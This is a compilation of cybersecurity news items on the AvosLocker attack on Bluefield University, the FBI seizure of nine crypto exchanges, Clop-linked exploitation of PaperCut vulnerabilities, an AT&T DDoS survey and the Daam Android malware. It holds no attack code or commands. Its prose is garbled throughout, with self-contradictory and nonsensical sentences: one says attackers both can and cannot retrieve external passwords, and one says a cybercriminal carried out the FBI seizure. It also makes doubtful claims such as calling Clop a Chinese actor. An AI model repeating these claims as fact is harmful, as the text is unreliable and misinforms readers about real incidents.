In addition, Avos Ransomware Gang's final message, or AvosLocker, implored the recipients of this malware to share the information they obtained with news outlets. This was to protect their data from exposure to the dark web. There was also an additional message which read, "Call President David Olive and tell him to pay us as soon as possible otherwise, prepare for attacks." 

It is worthwhile to remember, however, that the group's goal is to leak samples of stolen data. In addition, it provides a link where users can find stolen data. 

The school announced on Tuesday acknowledging that the RamAlert system had been hacked. However, it warns students not to click on any links provided by hackers and urges them not to click on emails. 

Due to the sudden change in time and the school's inability to hold final exams on Monday, they were postponed and pushed back one day. They were held on Tuesday, Wednesday, and Thursday rather than Monday. School systems, including email, remain unavailable at this time. 

Bluefield School officials have sent an email to all students and staff advising them not to open or transmit any links to their school accounts. These links have been sent to them. Several school systems in the area were still unavailable until a couple of days before the university's final exams, which were held in May. 

It is not clear whether or not the university will consider paying the hackers, according to the spokesperson for the university.   

From double extortion to triple extortion, ransomware groups have used a variety of methods to raise the stakes of their attacks on their victims. The school can accomplish this by emailing its customers, calling its partners, contacting the competition, and setting up portals with a search feature on them. This will enable it to discover data leaks. 

Bluefield University was attacked by the ransomware gang known as AvosLocker, which is known for speaking Russian on underground forums. In forums such as these, a user called "Avos" has been seen recruiting hackers regularly, many of whom end up working on behalf of the organization. 

A leak site maintained by the group has a list of victims from around the world that had been attacked by the group for several years. There has been an advisory published by the Federal Bureau of Investigation in the United States regarding the threat of AvosLocker. In addition to details about how the group operated in the past, recommendations on how to mitigate attacks are also included in the report.

Cryptocurrency Exchanges Linked to Ransomware

 


Nine cryptocurrency exchange websites have been taken down by the FBI and the Ukrainian police in a daring joint operation. Cybercriminals and ransomware gangs use these websites to launder money for cybercriminals. This is because these websites facilitate money laundering by criminals operating online. Ukrainian prosecutors' offices and the Virtual Currency Response Team were also involved in the operation. 

Several virtual currency exchange services were seized by the FBI on Monday. These services may have been used by cybercriminals to launder money obtained through ransomware hacks. As a result of a collaboration between the FBI's Detroit Field Office and Ukrainian police, the Detroit FBI field office seized virtual currency exchanges used by criminals for anonymous transactions, the United States Department of Justice has announced. 

There is a press release that states that the FBI also received support from the Virtual Currency Response Team (VCRT), the National Police of Ukraine, and the regional prosecutors as a result of the 'crypto exchanges' operation. 

  1. 24xbtc.com 
  2. 100btc.pro 
  3. pridechange.com 
  4. 101crypta.com 
  5. uxbtc.com 
  6. trust-exchange.org 
  7. bitcoin24.exchange 
  8. paybtc.pro 
  9. owl.gold 
These websites allow you to anonymously buy Bitcoin, Ether, and other cryptocurrencies. They offer Russian and English exchange services with few Know Your Customer (KYC) or Anti-Money Laundering (AML) restrictions. In addition to online forums dedicated to criminal activity, websites are also advertised. 

These exchange servers have been shut down, and their domain names have been taken over by US authorities. Several exchanges were accused of offering anonymous cryptocurrency exchange services to website visitors. These visitors included cybercriminals, scammers, and many other bad actors, offering these services anonymously to site visitors. 

The FBI has accused these crypto exchanges of being used by cyber criminals, including scammers, ransomware operators, and hackers, for laundering money. Additionally, the FBI stated that these exchanges did not have a license. This acted as support for criminal activities under US laws. 

Two servers were confiscated. These servers were located in different parts of the world including the US, Ukraine, and several European countries. Cybercriminals used the exchanges to launder money from illegal activities, and the authorities are using the seized infrastructure to identify and track down those hackers.

It should be noted that both the English and Russian-language exchanges that offered similar services and avoided money laundering were censured by the FBI for the lack of anti-money laundering measures and the collection of Customer knowledge information, or none at all. The FBI claims that these sorts of unlicensed, rogue exchanges are one of the most critical hubs of the cybercrime ecosystem. 

Users have been able to convert their cryptocurrency into coins that are more difficult to track down on websites that have been seized anonymously. Hackers disguised the source of the money they stole and avoided detection by law enforcement agencies.

There is a lot of variety on these sites. Users can get live help and instructions in both Russian and English covering a wide range of cybercrime communities. 

The FBI's announcement indicates that noncompliant virtual currency exchanges that operate in violation of the United States Code, Sections 1960 and 1956, act as hubs for cybercrime. They have lax anti-money laundering programs and collect little information about their customers. These exchanges are significant cybercrime centers.

A search was conducted at the home of former FTX executive Ryan Salame early this month. This was part of the FBI's investigation into Salame's role as an advisor to Bankman-Fried at the time. 

During an operation conducted by the FBI and Ukrainian police, the FBI and Ukrainian police took down nine websites known as 'crypto exchanges'. These websites were well known for serving as money launderers for ransomware groups and cyber criminals. As part of an organized campaign, the daring action was undertaken by a cybercriminal who wanted to destroy the digital infrastructure that allows him to make money from his malicious actions by “interfering” with it and using it for his malicious goals. 


Ransomware Clop and LockBit Attacked PaperCut Servers

 


A Microsoft spokesperson stated in a statement that recent attacks that exploited two vulnerabilities in the PaperCut print management software are likely associated with an affiliate program for the Clop ransomware. 

PaperCut Application Server was updated last month with two vulnerabilities that could allow remote attackers to execute unauthenticated code and access information.

CVE-2023–27350 / ZDI-CAN-18987 / PO-1216: This vulnerability affects all PaperCut MF/NG versions 8.0 or later on all OS platforms, as well as the application server. It impacts both the application server and the site server. 

CVE-2023–27351 / ZDI-CAN-19226 / PO-1219: A vulnerability in PaperCut MF or NG versions 15.0 or later is present on each application server platform, causing unauthenticated information disclosure.

It was notified last week that a vulnerability had been exploited in the wild by Trend Micro, and PaperCut sent an alert out to users. Customer servers must be updated as soon as possible to ensure security.

“Microsoft is attributing the recently reported attacks exploiting the CVE-2023-27350 and CVE-2023-27351 vulnerabilities in print management software PaperCut to deliver Clop ransomware to the threat actor tracked as Lace Tempest (overlaps with FIN11 and TA505),” a tweet by Microsoft Threat Intelligence reads.  

Last week, Microsoft Threat Intelligence identified “Lace Tempest” as one of the threat actors exploiting these bugs, according to a report about BR11 and TA505. 

FIN11, an organization involved in the acceleration of the Accellion FTA extortion campaign, is linked to the infamous Clop ransomware gang. Dridex is reportedly another example of malware linked to TA505 and responsible for Locky. 

Fortra's file-sharing software GoAnywhere has been exploited before by crypto-ransomware campaigns associated with the Clop ransomware affiliate. The affiliate also utilized the Raspberry Robin worm widely distributed in the cybersecurity community post-compromise to perform post-compromise activities.

PaperCut NG and PaperCut MF have flaws that affect both solutions. A remote code execution attack can be conducted on a PaperCut Application server using CVE-2023-27350 by an unauthenticated attacker, while a remote code execution attack on PaperCut MF or NG might also allow an unauthenticated attacker to steal information about users stored in PaperCut MF or NG, such as their names, full names, e-mail addresses, department information, and credit card numbers.

In addition to accessing hashed passwords retrieved from internal PaperCut accounts, attackers exploiting this vulnerability can also retrieve passwords retrieved from external directory sources, such as Microsoft 365 and Google Workspace (although they are not able to access password hashes retrieved from external directory sources such as Microsoft 365 and Google Workspace). 

There have previously been reports indicating that Lace Tempest, also known as DEV-0950, is a Clop affiliate. Lace Tempest has been detected using GoAnywhere exploits and Raspberry Robin malware as part of ransomware campaigns. PaperCut has been targeted since April 13 due to software vulnerabilities. 

Clop has Targeted This Target

It appears that the exploitation of PaperCut servers fits the overall pattern we have seen over the last three years about the Clop ransomware gang. 

Although the Clop operation continues to encrypt files and send them to victims in attacks, BleepingComputer has reported that the operation prefers to steal data from victims. This is so that it can be used to extort them for ransom. 

In 2020, Clop, a Chinese threat actor, exploited one of Accellion's zero-day vulnerabilities, the Accellion FTA, from which he stole data from approximately 100 companies as part of this new shift in tactics.

A zero-day vulnerability in the GoAnywhere MFT secure file-sharing platform has recently been exploited by the Clop gang to steal data from 130 companies due to zero-day vulnerabilities.

DDoS is Emerging as the Most Important Business Concern for Edge Networks

 

Businesses are particularly concerned about distributed denial-of-service (DDoS) attacks because they believe they will have the most impact on their operations. This was one of the key conclusions of AT&T's "2023 Cybersecurity Insights Report," which was based on a poll of 1,418 people. AT&T Business's head of cybersecurity evangelism, Theresa Lanowitz, describes the perceived risk and surge in concern about DDoS assaults as "surprising."

She adds, "With edge, the attack surface is changing, and taking down a large number of Internet of Things (IoT) devices can have a significant impact on the business, The near real-time data created and consumed by most edge use cases make DDoS attacks attractive. By its definition, a DDoS attack will degrade a network and response time. Those who have not invested in DDoS protection are indicating the timing is right to do so."

According to the report, ransomware dropped to eighth place out of eight in terms of perceived likelihood of attack type. Nonetheless, Lanowitz observes that over the last 24 months, organizations of all sizes have invested in ransomware prevention.

"However, ransomware criminals and their attacks are relentless," she warns. 

According to another research, cyber adversaries may cycle with the rise and decline of different sorts of attacks. Operating systems embedded in edge IoT devices make it more expensive for a financially motivated adversary to target the device with ransomware, explains Lanowitz.  

She further noted, "It is far more time intensive to write and deploy destructive code for an IoT device running a derivative of a version of Linux than to target a Windows-based laptop."

One of the most pleasantly surprising results in the report, she says, is how organizations are investing in security for an edge: security funds have grown to 22% of overall project costs, allocated evenly with strategy.

"We asked survey participants how they were allocating their budgets for primary edge use cases. The results show that security is clearly an integral part of the edge, and that security is being planned for proactively, " she explained.

She cited survey results indicating that apps, as well as much-needed security for ephemeral edge applications, are included in the overall plan for edge project funding. The expected outcome of what the edge delivers is shifting how organizations budget, plan, and think about focusing on a digital-first business, Lanowitz continues.

Another surprising finding from the survey is that globally, the likelihood of a compromise and impact to the business decreased by 28% and 26%, respectively.

She added, "Perhaps this is a case of irrational exuberance, but our qualitative analysis proves that with the edge there is far more communication and collaboration. Communication, cross-functional work, the line of business leading edge investments, and the use of trusted advisors all play a role in more optimism regarding catastrophic security events."

"Edge computing, with its changing attack surface, means the adversaries are seeing things differently," Lanowitz says. "Likewise, businesses must take that same view of an expanded attack surface, potential new threats, or potential increases in existing threats."

The report comes as DDoS attacks continue to make headlines, with the German government reporting that the Killnet DDoS knocked German websites offline temporarily, and the Serbian government reporting that it prevented five attempts aimed at destroying Serbian infrastructure.

KillNet, a pro-Russian hacktivist group that runs campaigns against countries that support Ukraine, has recently increased its daily DDoS attacks targeting healthcare organizations. In November 2022, over 50 of the most popular platforms available for hire to execute distributed DDoS assaults against important Internet infrastructure were shut down and their operators were arrested as part of Operation Power Off, a large multinational law enforcement sweep.

Beware of This Dangerous Android malware As It Can Hold Your Phone Hostage

 

A brand-new Android malware has been discovered in the wild that is capable of evading antivirus apps, stealing a tonne of private and financial information, and even encrypting all of the contents on an infected smartphone by using ransomware. 

According to a recent report from the cybersecurity company CloudSEK, this new Android malware, known as "Daam" by its experts, poses a serious threat to the greatest Android phones due to its advanced capabilities. 

As of right now, CloudSEK has discovered the Daam malware in the APK or Android app installation files for the Psiphon, Boulders, and Currency Pro apps, which appear to be sideloaded apps that the Daam malware uses to infect Android smartphones. Psiphon is a VPN programme; Boulders is a smartphone game; and Currency Pro is, as its name implies, a currency converter. 

Your Android phone may be infected with the Daam malware if you installed any of these apps via sideloading rather than through approved app stores like the Google Play Store. The malware can evade detection by antivirus software, and it may already have locked the files on your smartphone by using ransomware, so there may not be a simple remedy. 

File encryption 

The Daam malware is quite complex and has a variety of features intended to steal your data and jeopardise your privacy. For instance, the malware is capable of recording all active VoIP and phone calls, including WhatsApp calls. However, it can also steal your smartphone's files and even contacts. Surprisingly, the Daam malware can not only collect information from your existing contacts but also from newly added contacts. 

The hackers behind this malware campaign's command and control (C&C) server get all of the data that Daam has stolen before sending it back. It's important to note that after installation, dangerous apps used to spread malware request access to private device permissions in order to virtually completely control your Android smartphone. 

As if having all of this private information stolen wasn't bad enough, the Daam malware also encrypts all of the files on an infected Android smartphone using the AES encryption algorithm without getting permission from the user. The device password or PIN on a smartphone can also be changed at the same moment, locking you out totally. 

Mitigation tips

Normally, protecting yourself from mobile malware would only require installing one of the top Android antivirus programmes and turning on Google Play Protect on your phone. 

In this instance, though, the Daam malware was made to evade antivirus apps. Because of this, the best method to safeguard yourself against it is to be extra cautious while downloading new programmes. Although sideloading apps may be practical, doing so puts your Android smartphone at risk of becoming infected with malware. For this reason, you should only download apps from authorised Android app shops. Similar to this, you should still read reviews and check an app's rating before installing it because bad apps occasionally manage to get past Google's security checks.

At the same time, you should refrain from clicking any links sent to your smartphone by email or text message from unidentified senders. These links may take you to malicious websites that could trick you into installing malware or use phishing to collect your information. 

Although the Daam malware is relatively new, it is already quite capable of data theft and making life tough for Android smartphone owners. Because of this, we'll probably continue to hear about it.